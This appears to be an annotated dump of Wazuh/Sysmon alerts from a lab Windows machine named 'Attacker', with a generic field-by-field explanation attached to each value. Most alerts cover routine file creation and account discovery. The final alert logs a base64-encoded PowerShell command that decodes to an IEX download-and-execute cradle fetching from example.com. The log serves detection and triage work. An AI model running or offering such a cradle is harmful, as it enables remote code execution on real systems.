data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-timezone-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.382 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.722656 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4134132Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260684 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.412
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-math-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.412
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-math-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.725742 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4327048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260692 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.431
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-utility-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.431
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.431 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-utility-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.431 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.728840 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4706482Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260707 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.469
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-security-sddl-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.469
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.469 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-security-sddl-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.469 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is back to normal load. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 205 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534164.731946 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'normal'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: normal Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534166.732160 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:18.9512698Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 266202 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:31:18.668
ProcessGuid: {94294ddc-bbb6-680a-ba09-000000000e00}
ProcessId: 9932
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:31:18.668 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bbb6-680a-ba09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.737392 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:53.1717799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 279823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:32:52.033
ProcessGuid: {94294ddc-bc14-680a-020a-000000000e00}
ProcessId: 9372
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00}
ParentProcessId: 13080
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:32:52.033 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc14-680a-020a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
